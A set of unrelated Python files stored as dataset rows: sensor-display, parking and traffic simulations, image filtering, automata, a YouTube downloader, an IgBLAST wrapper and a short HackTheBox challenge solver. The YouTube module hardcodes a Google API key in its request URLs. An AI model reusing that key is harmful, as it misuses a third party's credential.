text.\n if humidity is not None and temperature is not None: \n \n draw.text((x, top + 0), \"Co2 : \" + str(Co2).rjust(4,' ') + \" PPM\", \\\n font=font, fill=255)\n draw.text((x, top + 16), \"TEM : \" + \"{:.1f}\".format(temperature) + \" C\", \\\n font=font, fill=255)\n draw.text((x, top + 32), \"HUM : \" + \"{:.1f}\".format(humidity) + \" %\", \\\n font=font, fill=255)\n \n timestamp = clock.now()\n \n draw.text((x, top + 48), timestamp.strftime('%d/%m %H:%M:%S'), \\\n font=font, fill=255)\n \n file.write('{0},{1:0.1f},{2:0.1f}%,{3}\\r\\n'.format(timestamp.strftime('%x %X'),\\\n temperature, humidity, Co2))\n \n print('{0},{1:0.1f},{2:0.1f}%,{3}\\r\\n'.format(timestamp.strftime('%x %X'),\\\n temperature, humidity, Co2))\n \n else:\n \n draw.text((x, top + 0), \"Co2 : \" + \"ERROR\", font=font, fill=255)\n draw.text((x, top + 16), \"TEM : \" + \"ERROR\", font=font, fill=255)\n draw.text((x, top + 32), \"HUM : \" + \"ERROR\", font=font, fill=255)\n \n timestamp = clock.now()\n draw.text((x, top + 48), timestamp.strftime('%d/%m %H:%M:%S'), \\\n font=font, fill=255) \n\n # Display image.\n disp.image(image)\n disp.display()\n time.sleep(.1)\n \n \n except Exception as exception:\n \n print(exception)\n sys.exit(0)\n \nexcept KeyboardInterrupt as ex:\n \n draw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\n font = ImageFont.truetype('Mario-Kart-DS.ttf',24)\n draw.text((x, top + 1), \" studying \", font=font, fill=255)\n draw.text((x, top + 22), \"just got \", font=font, fill=255)\n draw.text((x, top + 44), \"FRESHER !! \", font=font, fill=255)\n\n # Display image.\n disp.image(image)\n disp.display()\n time.sleep(2)\n \n draw.rectangle((0, 0, width, height), outline = 0, fill = 0)\n\n font = ImageFont.truetype('Mario-Kart-DS.ttf',34)\n draw.text((x, top + 1), \"STAY \", font=font, fill=255)\n draw.text((x, top + 33), \"FRESH ! \", font=font, fill=255)\n\n # Display image.\n disp.image(image)\n disp.display()\n time.sleep(2)\n \n disp.clear()\n disp.reset()\n disp.display()\n \n print(ex)\n \n sys.exit(0)\n\n ","sub_path":"Archive/Alpha/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300039323","text":"# -*- coding:utf-8 -*-\n\nimport pygame\nimport random\nimport os\nimport argparse\nimport settings as opt\nimport logging\nfrom panel import PanelSocketServer\n\ninfo = logging.info\ndebug = logging.debug\nerror = logging.error\nwarning = logging.warning\n\nprogname = os.path.basename(__file__)\ncollide = pygame.sprite.spritecollide\n\nGAME = None\n\ndef setup_logging(opt):\n \"\"\"Configure basic logging.\"\"\"\n\n log_level = opt.verbose and logging.DEBUG or logging.INFO\n logging.basicConfig(level=log_level,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%d-%m %H:%M:%S',\n filename=\"parking.log\",\n filemode='w')\n\n logger = logging.getLogger()\n logger.setLevel(log_level)\n\n console = logging.StreamHandler()\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n console.setFormatter(formatter)\n console.setLevel(logging.DEBUG)\n logger.addHandler(console)\n\ndef parse_args(args):\n \"\"\"Parse command line ARGS. 
Return 'mapping' (from argparse).\"\"\"\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n add = parser.add_argument\n add(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Makes program more chatty.\")\n add(\"--width\", type=int, default=opt.WIDTH,\n help=\"Screen width.\")\n add(\"--height\", type=int, default=opt.HEIGHT,\n help=\"Screen height.\")\n add(\"--fps\", type=int, default=60,\n help=\"Screen update frequency.\")\n add(\"--random-moves-interval\", type=float, default=0.5,\n help=\"Time between consecutive random moves.\")\n\n return parser.parse_args(args)\n\ndef do_options(args):\n opt.FPS = args.fps\n opt.WIDTH = args.width\n opt.HEIGHT = args.height\n opt.RANDOM_MOVES_INTERVAL = args.random_moves_interval\n\n#\nimport socket\nclass SocketServer():\n\n def __init__(self, game, host=\"\", port=8000):\n try:\n self.game = game\n port = random.randint(2000, 9000)\n with open(\"port.txt\", \"w\") as file:\n file.write(\"%d\\n\" % port)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((host, int(port)))\n self.sock.listen(5)\n print(\"SocketServer running on port %d\" % port)\n except socket.error:\n raise Exception(\"SocketServer: error creating socket\")\n\n def _get_sensors_state(self):\n d = {s.oid:s.active for s in self.game.sensors}\n return [(k,v) for k,v in sorted(d.items())]\n\n def run(self):\n while 1:\n channel, client = self.sock.accept()\n info(\"server got connection from %s\", str(client))\n ss = [v and \"X\" or \"_\"\n for _,v in self._get_sensors_state()]\n o = \" \".join(ss)\n channel.send(o.encode())\n channel.close()\n\n#\nclass SocketClient():\n\n def __init__(self, host=\"\", port=8000):\n self.host = host\n self.port = int(port)\n\n def get_data(self):\n try:\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n raise Exception(\"SocketClient: error creating socket\")\n sys.exit(1)\n self.sock.connect((self.host, self.port))\n data = self.sock.recv(1024)\n self.sock.close()\n return data\n\ndef main(args):\n \"\"\"Main program.\"\"\"\n\n global GAME\n\n import threading\n import game\n import sys\n args = parse_args(args) # parse command line arguments\n setup_logging(args) # config logging\n do_options(args)\n\n try:\n pygame.init()\n GAME = g = game.Game()\n\n s = SocketServer(g)\n p = PanelSocketServer(g)\n pt = threading.Thread(target=p.run)\n pt.daemon = True\n\n pt.start()\n t = threading.Thread(target=s.run)\n t.daemon = True\n t.start()\n\n while g.running:\n g.start_new()\n g.run()\n debug(\"Quitting pygame...\")\n\n finally:\n pygame.quit()\n return 0\n\nif __name__ == \"__main__\":\n\n import sys\n args = sys.argv[1:]\n sys.exit(main(args))\n","sub_path":"parking_simulation.py","file_name":"parking_simulation.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"276770474","text":"from PIL import Image\nimport math\nimport numpy\nfrom numpy import asarray\n\nme = '[Sobel]'\ncount = 0\nclass Sobel:\n\n def __init__(self, filename, Threshold, Gx=[[-1,0,1],[-2,0,2],[-1,0,1]], Gy=[[-1,-2,-1], [0,0,0], [1,2,1]]):\n self.filename = filename\n self.threshold = Threshold\n self.Gx = Gx\n self.Gy = Gy\n self.img = Image.open(self.filename)\n self.processThis = asarray(self.img)\n self.Gx = asarray(self.Gx)\n self.Gy = asarray(self.Gy)\n self.rows, self.columns, self.depth =self.processThis.shape\n self.result = Image.new(self.img.mode, 
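SocketClient in the parking simulation above still defaults to port 8000 and carries an unreachable sys.exit(1) after a raise, while the server actually binds a random port and records it in port.txt. A client sketch that follows the server's own convention (host and file name are the snippet's defaults):

import socket

def read_sensor_state(host="localhost", port_file="port.txt"):
    # The server picks a random port and writes it to port.txt,
    # so the client reads it back instead of assuming 8000.
    with open(port_file) as f:
        port = int(f.read().strip())
    with socket.create_connection((host, port)) as conn:
        data = conn.recv(1024)
    # The server sends one flag per sensor: "X" = active, "_" = inactive.
    return data.decode().split()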
(self.rows, self.columns))\n self.result1 = self.result.load()\n self.mag = Image.new(self.img.mode, (self.rows, self.columns))\n self.magMap = self.mag.load()\n self.NormI = Image.new(self.img.mode, (self.rows, self.columns))\n self.sobel()\n\n def sobel(self):\n mag = []\n maxScalar = 0\n for i in range(self.rows-2):\n for j in range(self.columns-2):\n S1 = self.Gx.dot(self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),0] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),1] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),2])/8\n S2 = self.Gy.dot(self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),0] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),1] + \\\n self.processThis[i:i+len(self.Gx),j:j+len(self.Gy),2])/8\n\n\n mag_scalar = numpy.linalg.norm((numpy.sum(S1)**2) + (numpy.sum(S2)**2))\n\n self.magMap[i, j] = (int(mag_scalar),0,0)\n\n if mag_scalar > maxScalar:\n maxScalar = mag_scalar\n\n if self.magMap[i,j][0] >= self.threshold:\n self.result1[i,j] = (0, 0, 0)\n else:\n self.result1[i,j] = (255,255,255)\n\n print(\"Max Gradient: \" + str(maxScalar))\n maxGradient = maxScalar\n NormalizedGradient = self.NormI.load()\n\n for i in range(self.rows):\n for j in range(self.columns):\n NormalizedGradient[i,j] = (int((self.magMap[i,j][0] / 1028)*255), 0,0)\n print(NormalizedGradient[i,j][0])\n if NormalizedGradient[i,j][0]:\n NormalizedGradient[i,j] = (0,0,0)\n else:\n NormalizedGradient[i,j] = (255,255,255)\n global count\n count += 1\n self.NormI.save('Normalized_Gradient_' + str(count) +self.filename)\n print(me + 'INFO>Successfully Edge Detected with Sobel')\n\nif __name__ == '__main__':\n obj = Sobel(\"logo.png\", 200)\n obj.result.save('sobel_' + obj.filename)\n #laplacian\n lap = Sobel(\"logo.png\", 200,[[0,-1,0],[-1,4,-1], [0,-1,0]],[[-1,-1,-1],[-1,8,-1],[-1,-1,-1]])\n obj.result.save('laplacian_' + obj.filename)\n","sub_path":"python/sobelOperator/sobel.py","file_name":"sobel.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"360295513","text":"# coding=utf-8\n\"\"\"Reverse Pairs.\n\n>>> solve = _solve\n>>> solve([1, 3, 2, 3, 1])\n2\n>>> solve([2, 4, 3, 5, 1])\n3\n\"\"\"\n\n# 此题的其他解法包括\n# - BST:手动维护一颗二叉搜索树,虽然不做优化最坏情况复杂度为 O(n^2),但是此题可过\n# - BIT:树状数组,利用其 O(log(n)) 时间复杂度内修改单个元素并且维护区间信息的性质可作\n# 具体可参考此题的 solution\n\n\ndef _solve(nums):\n def _merge(low, mid, high):\n l_i, r_i = low, mid + 1\n total = 0\n while l_i <= mid and r_i <= high:\n if nums[l_i] > 2 * nums[r_i]:\n total += mid + 1 - l_i\n r_i += 1\n else:\n l_i += 1\n\n aux[low:high + 1] = nums[low:high + 1]\n l_i, r_i = low, mid + 1\n for i in xrange(low, high + 1):\n if l_i > mid:\n nums[i] = aux[r_i]\n r_i += 1\n elif r_i > high:\n nums[i] = aux[l_i]\n l_i += 1\n elif aux[r_i] < aux[l_i]:\n nums[i] = aux[r_i]\n r_i += 1\n else:\n nums[i] = aux[l_i]\n l_i += 1\n return total\n\n def _sort(low, high):\n if low < high:\n mid = low + (high - low) / 2\n total = _sort(low, mid) + _sort(mid + 1, high)\n return total + _merge(low, mid, high)\n return 0\n\n aux = [0] * len(nums)\n return _sort(0, len(nums) - 1)\n","sub_path":"hard/493.py","file_name":"493.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"445886791","text":"from __future__ import unicode_literals\nimport requests\nimport globals\nfrom termcolor import colored\nfrom django.conf import settings\nfrom vibes.weekly_setup.youtube_downloader import 
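In the Sobel module above, the __main__ block builds a second instance with Laplacian kernels as lap but then saves obj.result again, so the Laplacian image is never written. A corrected sketch of that block:

if __name__ == '__main__':
    obj = Sobel("logo.png", 200)
    obj.result.save('sobel_' + obj.filename)
    # Laplacian kernels via the same class; save from the lap instance.
    # The original re-saved obj.result under the laplacian_ name.
    lap = Sobel("logo.png", 200,
                [[0, -1, 0], [-1, 4, -1], [0, -1, 0]],
                [[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]])
    lap.result.save('laplacian_' + lap.filename)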
YoutubeDownloader\nfrom weeklyvibes import slack_utils\nimport isodate\n\nclass YoutubeTracksGetter:\n\n @classmethod\n def get_songs(cls, artist, songs):\n successful_downloads = []\n\n slack_utils.send_debug_slack_message('Searching for songs on youtube...', 6)\n for song_name in songs:\n if len(successful_downloads) >= globals.MAX_SONGS_PER_ARTIST:\n break\n\n slack_utils.send_debug_slack_message('Searching for song: ' + song_name, 7)\n\n params = (artist.name + ' ' + song_name)\n request_url = \"https://www.googleapis.com/youtube/v3/search?part=snippet&q=%s&type=video&videoCategoryId=10&key=AIzaSyAAcI5ehq9HIGXpcpaRvFvrYgWk3aOUxJI\" % params\n r = requests.get(request_url)\n if r.status_code is 200:\n if len(r.json()['items']) > 0:\n video_id = r.json()['items'][0]['id']['videoId']\n yt_url = \"http://youtube.com/watch?v=%s\" % video_id\n slack_utils.send_debug_slack_message('Found song at: ' + yt_url, 8)\n\n if YoutubeTracksGetter.check_should_download(video_id):\n song = YoutubeDownloader.download_song(artist, song_name, yt_url, video_id)\n if song is not None:\n successful_downloads.append(song)\n\n else:\n # notify us\n slack_utils.send_error_slack_message('Youtube api returned status code: %d' % (r.status_code))\n\n return successful_downloads\n\n @classmethod\n def check_should_download(cls, video_id):\n request_url = \"https://www.googleapis.com/youtube/v3/videos?key=AIzaSyAAcI5ehq9HIGXpcpaRvFvrYgWk3aOUxJI&part=contentDetails&id=%s\" % video_id\n r = requests.get(request_url)\n if r.status_code is 200:\n duration = r.json()['items'][0]['contentDetails']['duration']\n dur = isodate.parse_duration(duration)\n return dur.total_seconds() <= globals.MAX_SONG_DURATION\n \n else:\n slack_utils.send_error_slack_message('Youtube api returned status code: %d on content details' % (r.status_code))\n","sub_path":"weeklyvibes/vibes/weekly_setup/youtube_tracks_getter.py","file_name":"youtube_tracks_getter.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52238485","text":"import sys\nimport os\nimport argparse\n\n\n#==============================\ncurr_version = 1.0\nparser = argparse.ArgumentParser(\n description=\"This search TCR sequence in .\")\n\nparser.add_argument(\n \"--inpfile\", nargs=1, type=str, default=\"../test_tcr_human.txt\",#_nucleotide.fasta\",\n help=\"input file path.\")\nparser.add_argument(\n \"--outfile\", nargs=1, type=str, required=False, help=\"path to output data\"\n)\nparser.add_argument(\n \"--seqtype\", nargs=1, type=str, default=\"aminoacid\", help=\"nucleotide or aminoacid sequences?\")\nparser.add_argument(\n \"--specie\", nargs=1, type=str, default=\"HomoSapiens\", help=\"Specie name in CamelCase\")\n\nargs = parser.parse_args()\n\nif type(args.inpfile) is list:\n args.inpfile = args.inpfile[0]\ninpfile = args.inpfile\n\nif type(args.seqtype) is list:\n args.seqtype = args.seqtype[0]\nseq_type = args.seqtype\n\nif type(args.specie) is list:\n args.specie = args.specie[0]\nspecie = args.specie\n\nif args.outfile is not None:\n if type(args.outfile) is list:\n args.outfile = args.outfile[0]\n outfile = args.outfile\nelse:\n outfile = \".\".join(inpfile.split(\".\")[:-1])+\"_igblast_out.txt\"\n\nsegments = (\"Variable\", \"Diversity\", \"Joining\")\n\nworkdir = os.path.join(\"igblast_db\", specie.lower(), \"{}_{}_{}_sequences.fasta\".format(seq_type, specie, \"{}\"))\n\nv_db = workdir.format(\"Variable\")\nd_db = workdir.format(\"Diversity\")\nj_db = 
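Both HTTP status checks in the YouTube helper above use r.status_code is 200. That only passes because CPython caches small integers, and it draws a SyntaxWarning on Python 3.8+; equality is the portable comparison. A sketch (the endpoint below is a stand-in, not the snippet's full request_url):

import requests

# Hypothetical endpoint standing in for the snippet's request_url.
r = requests.get("https://www.googleapis.com/youtube/v3/videos")
# Compare with ==, not 'is': matching an int literal by identity relies
# on CPython's small-int cache and warns on Python 3.8+.
if r.status_code == 200:
    items = r.json().get('items', [])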
workdir.format(\"Joining\")\n\n\nif seq_type == \"nucleotide\":\n igblastcmd = \"/usr/local/ncbi/igblast/bin/igblastn\"\n blastcmd = \"blastn\"\n cmd = \"-germline_db_J {} -germline_db_D {} \".format(j_db, d_db)\nelif seq_type == \"aminoacid\":\n igblastcmd = \"/usr/local/ncbi/igblast/bin/igblastp\"\n blastcmd = \"blastp\"\n cmd = \"\"\nelse:\n sys.exit(1)\n\n\nblastcmd = \"{} -db {} -query {} -out {}\".format(blastcmd, j_db, inpfile, \"\")\n\ncmd = \"{} -germline_db_V {} {}-query {} -out {}\".format(igblastcmd, v_db, cmd, inpfile, outfile)\nprint(cmd)\nos.system(cmd)\n\n","sub_path":"ch_scripts/parse_tcr/igblast/igblast_seq.py","file_name":"igblast_seq.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"625989549","text":"import requests \nimport hashlib\n\n\nurl = \"http://docker.hackthebox.eu:49946\"\n\n\nsession = requests.Session()\nr = session.get(url)\nemdeeFive = r.text[167:187].encode('utf-8')\ndat = hashlib.md5(emdeeFive).hexdigest()\ndata = {'hash':dat} \nrequest = session.post(url,data)\n\nprint(request.text)\n","sub_path":"emdeeFiveForLife.py","file_name":"emdeeFiveForLife.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"639800303","text":"# coding=utf-8\nfrom __future__ import annotations\nfrom typing import List, Set, Any, Union, NoReturn\nimport string\n\nfrom utils import Epsilon\n\n__all__ = ('NFAState', 'NFA', 'DFAState', 'DFA')\n\n\nclass NFAState(object):\n count = 0\n\n def __init__(self):\n self.id = NFAState.count\n self.map = {}\n NFAState.count += 1\n\n def map_to(self, to: NFAState, ch: str) -> NoReturn:\n if self.map.get(ch) is None:\n self.map[ch] = {to}\n else:\n self.map[ch].add(to)\n\n def transfer(self, ch) -> Set[NFAState]:\n return self.map[ch]\n\n def __repr__(self):\n return f\"\"\n\n def __str__(self):\n return f\"S{self.id}\"\n\n def __hash__(self):\n return hash(id(self))\n\n\nclass NFA(object):\n def __init__(self):\n self.q0 = None\n self.states = set()\n self.accept_states = set()\n self.chars = string.printable\n\n def new_state(self) -> NFAState:\n q = NFAState()\n self.states.add(q)\n\n if self.q0 is None:\n self.q0 = q\n\n return q\n\n def accept(self, q: NFAState) -> NoReturn:\n self.accept_states.add(q)\n\n\nclass DFAState(object):\n count = 0\n\n def __init__(self):\n self.id = DFAState.count\n self.map = {}\n DFAState.count += 1\n\n def map_to(self, to: DFAState, ch: str) -> NoReturn:\n assert self.map.get(ch) is None\n self.map[ch] = to\n\n def transfer(self, ch) -> DFAState:\n return self.map[ch]\n\n def __repr__(self):\n return f\"\"\n\n def __str__(self):\n return f\"S{self.id}\"\n\n def __hash__(self):\n return hash(id(self))\n\n\nclass DFA(object):\n def __init__(self, frm: NFA = None):\n self.q0 = None\n self.states = set() # type: Set[DFAState]\n self.accept_states = set() # type: Set[DFAState]\n\n if frm is not None:\n self.build_from_NFA(frm)\n\n @staticmethod\n def possible_next_chars(states: Set[NFAState]) -> Set[Any]:\n ret = set()\n for state in states:\n ret.update(state.map.keys())\n ret.discard(Epsilon)\n return ret\n\n def build_from_NFA(self, nfa: NFA) -> NoReturn:\n self.q0 = self.new_state()\n self.states.add(self.q0)\n\n states = [self.epsilon_closure({nfa.q0})]\n dfa_states = [self.q0]\n\n total = 1\n current = 0\n\n while current < total:\n for ch in self.possible_next_chars(states[current]):\n new_states: Set[NFAState] = 
self.edge(states[current], ch)\n if new_states == set():\n continue # 如果是空集,直接跳过\n for i in range(total):\n if new_states == states[i]: # 如果该集合已存在\n dfa_states[current].map_to(dfa_states[i], ch)\n break\n else:\n states.append(new_states)\n new_dfa_state = self.new_state()\n dfa_states.append(new_dfa_state)\n dfa_states[current].map_to(new_dfa_state, ch)\n total += 1\n # 更新 DFA 的接受状态集\n for nfa_state in new_states:\n if nfa_state in nfa.accept_states:\n self.accept(new_dfa_state)\n break\n current += 1\n\n def epsilon_closure(self, states: Union[List[NFAState], Set[NFAState]]) \\\n -> Set[NFAState]:\n closure = set()\n for state in states:\n closure.add(state)\n temp_closure = state.map.get(Epsilon, None)\n if temp_closure is not None:\n closure.update(temp_closure)\n closure.update(self.epsilon_closure(temp_closure))\n return closure\n\n def edge(self, frm: Set[NFAState], ch: str) -> Set[NFAState]:\n to_states = set()\n for state in frm:\n temp_states = state.map.get(ch) # type: Set[NFAState]\n if temp_states is not None:\n to_states.update(temp_states)\n\n return self.epsilon_closure(to_states)\n\n def new_state(self) -> DFAState:\n q = DFAState()\n self.states.add(q)\n return q\n\n def accept(self, q: DFAState) -> NoReturn:\n self.accept_states.add(q)\n","sub_path":"Principle of Compiler (2019)/ProjectOLang/FA.py","file_name":"FA.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"316387565","text":"# Date: 11/30\n# Add reaction time after detecting gap_safe\n# Add car's object\n\nfrom vpython import *\nfrom math import cos, sin, pi\nimport random\nfrom random import seed\nseed(0)\nimport numpy as np\n\ndef km_to_m(x):\n\treturn x/3.6\n\ndef m_to_km(x):\n\treturn 3.6*x\n\ndef to_degree(x):\n\treturn x/circular_radius\n\ndef to_length(degree):\n\treturn degree*circular_radius\n\ndef set_initial_position(car_id):\n\treturn - interval*(car_id + (random.random()-0.5)*0.125*0.1)\n\ndef get_color(car_id = 0, speed = 0, use_speed_color = True):\n\tif use_speed_color:\n\t\tmax_speed = km_to_m(108)\n\t\tif speed < km_to_m(20): return vec(1, 0, 0)\n\t\telif speed < km_to_m(30): return vec(1, 0.5, 0)\n\t\telif speed < km_to_m(45): return vec(1, 1, 0)\n\t\telif speed < km_to_m(60): return vec(0.2, 1, 0.2)\n\t\telif speed < km_to_m(80): return vec(0, 1, 0.6)\n\t\telse: return vec(0, 0.5, 1)\t\n\telse:\n\t\tif car_id == 0: return color.red\n\t\telif car_id == 1: return color.green\n\t\telif car_id % 2: return color.yellow\n\t\telse: return color.blue\n\t\ndef output_situation(output_number = 4, output_ave_speed = True, output_speed = True, output_position = True, output_gap = True):\n\tprint(\"T = %.2f\" %t)\n\taverage_speed = m_to_km(np.mean(np.array([car.speed for car in cars])))\n\tif output_ave_speed: print('Average speed of all cars = %.2f (km/h)' %average_speed)\n\tif output_speed:\n\t\tprint('Speed(km/h) =', end = ' ')\n\t\tfor i in range(output_number): print(\"%.2f\" %m_to_km(cars[i].speed), end=\"\\t\")\n\t\tprint()\n\tif output_position:\n\t\tprint('Theta(degree)=', end = ' ')\n\t\tfor i in range(output_number): print(\"%.2f\" %((cars[i].theta)/2/pi*360), end=\"\\t\")\n\t\tprint()\n\tif output_gap:\n\t\tprint('Gap(m) =', end = ' ')\n\t\tfor i in range(output_number): print(\"%.2f\" %(cars[i].save_gap), end=\"\\t\")\n\t\tprint()\n\tprint('error_count =', error_count, '\\n')\n\nclass Cars_obj(sphere):\n\tdef __init__(self, car_id, version = 1):\n\t\tself.theta = set_initial_position(car_id) # 
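A usage sketch for the automata classes above: build a three-state NFA that accepts exactly "ab", let DFA.__init__ run the subset construction via build_from_NFA(), and walk the result (module name taken from the record's sub_path, FA.py):

from FA import NFA, DFA

nfa = NFA()
q0, q1, q2 = nfa.new_state(), nfa.new_state(), nfa.new_state()  # first call becomes q0
q0.map_to(q1, 'a')
q1.map_to(q2, 'b')
nfa.accept(q2)

# Subset construction runs inside DFA.__init__.
dfa = DFA(frm=nfa)
state = dfa.q0
for ch in "ab":
    state = state.transfer(ch)
assert state in dfa.accept_states  # the DFA accepts exactly "ab"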
initial position\n\t\tself.min_speed = 0 \t\t# (meter/sec)\n\t\tself.max_speed = km_to_m(108)\n\t\tself.max_accel = 0.3 \t\t# (meter/sec^2)\n\t\tself.max_decel = 3\n\t\tself.speed = random.gauss(mu = km_to_m(initial_mean_speed), sigma = km_to_m(initial_mean_speed)*0.125*0.2) # initial speed, gaussian distribution\n\t\t#self.speed = km_to_m(50) * (1 + (random.random()-0.5) * 0.5)\t# uniform distribution \n\t\t#self.compute_save_gap()\n\t\tsphere.__init__(self, pos = circular_radius * vec(cos(self.theta), sin(self.theta), 0), \n\t\t\t\t\t\tradius = 1.5, color = get_color(car_id, self.speed, use_speed_color)) # for car's visualization\n\t\t\nclass Cars_human_driver(Cars_obj):\n\tdef __init__(self, car_id, version = 1):\n\t\tsuper().__init__(car_id)\n\t\tif version == 1: # Eating\n\t\t\tself.decel = random.gauss(mu = 1.5, sigma = 1.5*0.125)\n\t\t\t#self.accel = random.gauss(mu = 0.15, sigma = 0.15*0.125)\n\t\t\tself.accel = self.decel * 0.5\n\t\t\tself.decel = min(max(0, self.decel), self.max_decel)\n\t\t\tself.accel = min(max(0, self.accel), self.max_decel * 0.5)\n\t\t\tself.reaction_time_accel = min(random.gauss(mu = 2.0, sigma = 2.0*0.125), max_idle_time) # max = 5 sec, default mu = 3\n\t\t\tself.reaction_time_decel = self.reaction_time_accel * 0.5\n\t\t\t#self.reaction_time_decel = random.gauss(mu = 1.5, sigma = 1.5*0.125)\n\t\telif version == 2: \n\t\t\tself.accel = random.gauss(mu = 0.3*9.8/2.0, sigma = 0.03*9.8)\n\t\t\tself.decel = random.gauss(mu = 0.5*9.8/2.0, sigma = 0.03*9.8)\n\t\t\tself.reaction_time_accel = random.gauss(mu = 2.5, sigma = 0.0) # 設定成 dt 的話表示不會發呆,設成零可能會有 error\n\t\t\tself.reaction_time_decel = random.gauss(mu = 2.5, sigma = 0.0)\n\n\tdef compute_save_gap(self):\n\t\tself.save_gap = max(2*self.speed, min_gap)\n\t\treturn self.save_gap\n\t\t\nclass Autonomous_connected_cars(Cars_obj):\n\tdef __init__(self, car_id, is_connected, version = 1):\n\t\tsuper().__init__(car_id)\n\t\tif version == 1:\n\t\t\tself.accel = self.max_accel # can modify this value in the future\n\t\t\tself.decel = self.max_decel\n\t\t\tif is_connected == False:\n\t\t\t\tself.reaction_time_accel = 0.5\n\t\t\t\tself.reaction_time_decel = 0.5\n\t\t\telse: \n\t\t\t\tself.reaction_time_accel = 0.1\n\t\t\t\tself.reaction_time_decel = 0.1\n\t\t\t\n\tdef compute_save_gap(self, speed_front):\n\t\treturn 0.1*self.speed + self.speed**2/2.0/self.decel - speed_front**2/2.0/self.decel + min_gap\n\t\t# this equation is not all correct\n\t\t\n# global variable settings\nglobal_version = 2 \t\t\t\ncars_variable_version = 1 \t\ncars_settings_list = ['human', 'auto', 'auto+is_connected']\ncars_settings = cars_settings_list[2]\nif cars_settings == 'human':\n\tis_autonomous = False\n\tis_connected = False\nelif cars_settings == 'auto':\n\tis_autonomous = True\n\tis_connected = False\nelif cars_settings == 'auto+is_connected':\n\tis_autonomous = True\n\tis_connected = True\n\nmin_gap = 5 \t\t\t\t# distance between two cars cannot less than min_gap\ndt = 0.002\nt = 0\n\nif not is_autonomous: max_idle_time = 5 \t\t\t# 最多發呆五秒\nelif not is_connected: max_idle_time = 1\nelif is_connected: max_idle_time = 1\ninitial_mean_speed = 40 \t# here! 
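compute_save_gap for the autonomous cars above adds a 0.1 s reaction distance to the difference between the two cars' braking distances (the snippet's own comment concedes the equation is approximate). With the class defaults, decel = max_decel = 3 m/s^2 and min_gap = 5 m, the numbers work out as follows:

def safe_gap(v, v_front, decel=3.0, min_gap=5.0):
    # 0.1 s reaction distance + own braking distance
    # - leader's braking distance + minimum gap
    return 0.1 * v + v**2 / (2.0 * decel) - v_front**2 / (2.0 * decel) + min_gap

print(safe_gap(15.0, 15.0))  # 6.5  -> equal speeds leave only reaction distance + min_gap
print(safe_gap(15.0, 0.0))   # 44.0 -> a stopped leader demands the full braking distance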
(km/hr)\nremove_error_speed = km_to_m(15)\nnot_jam_speed = km_to_m(20) \nuse_speed_color = True \n\nif global_version == 1:\t\t# default setting\n\tnum_cars = 22 \t\t\t# at least 2\n\tcircular_radius = 230/2.0/pi \nelif global_version == 2:\t# better visiualization setting\n\tnum_cars = 20\t\t\t# at least 2\n\tcircular_radius = 400/2.0/pi \n\tdt = 0.004\nelif global_version == 3: # you can do experiment here\n\tnum_cars = 22 \t\t\t# at least 2\n\tcircular_radius = 230/2.0/pi \n\n# For human drivers\nif not is_autonomous or True:\n\tnext_action = np.zeros([num_cars, int(max_idle_time/dt)], dtype = np.int8)\n\tprint('next_action =', next_action.shape) \n\t# 1 for accel, -1 for decel, 0 for nothing\n\t# pull in front, and push in the end\n\n# visualization\nscene = canvas(background = vec(0.4, 0.7, 0.7), width = 1200, height = 800)\npath = cylinder(pos = vec(0, 0, -circular_radius*0.025), axis = vec(0, 0, -circular_radius*0.05), radius = circular_radius * 1.05, color = vec(0.1, 0.2, 0.2))\npark = cylinder(pos = vec(0, 0, -circular_radius*0.025+0.1), axis = vec(0, 0, -circular_radius*0.052), radius = circular_radius * 0.95, color = vec(0.4, 0.7, 0.7))\nmsg = text(text = 'Number of cars = %d\\nLength of circular = %d(m)' % (num_cars, circular_radius*2*pi), pos = vec(-18, 0, 0), height = 3) # here!\nerror_count = 0\n\ncars = []\ninterval = 2*pi/float(num_cars)\nprint(\"interval = %.3f, %.3f\" %(interval, interval*circular_radius))\nif not is_autonomous:\n\tfor i in range(num_cars): cars.append(Cars_human_driver(i))\nelse:\n\tfor i in range(num_cars): cars.append(Autonomous_connected_cars(i, is_connected))\n\tspeed_front = [0 for i in range(num_cars)]\n\tprint('reaction time =', cars[1].reaction_time_decel, cars[1].reaction_time_accel)\n\nwhile True:\n\trate(1/dt)\n\tnext_action[:, :-1] = np.copy(next_action[:, 1:]) # update next action array\n\t\n\tfor i in range(num_cars):\n\t\tif is_autonomous:\n\t\t\tif i != 0: speed_front[i] = cars[i-1].speed\n\t\t\telse: speed_front[i] = cars[num_cars-1].speed\n\t\t\tcars[i].save_gap = cars[i].compute_save_gap(speed_front[i])\n\t\telse:\n\t\t\tcars[i].save_gap = cars[i].compute_save_gap()\n\t\tif i != 0: current_gap = 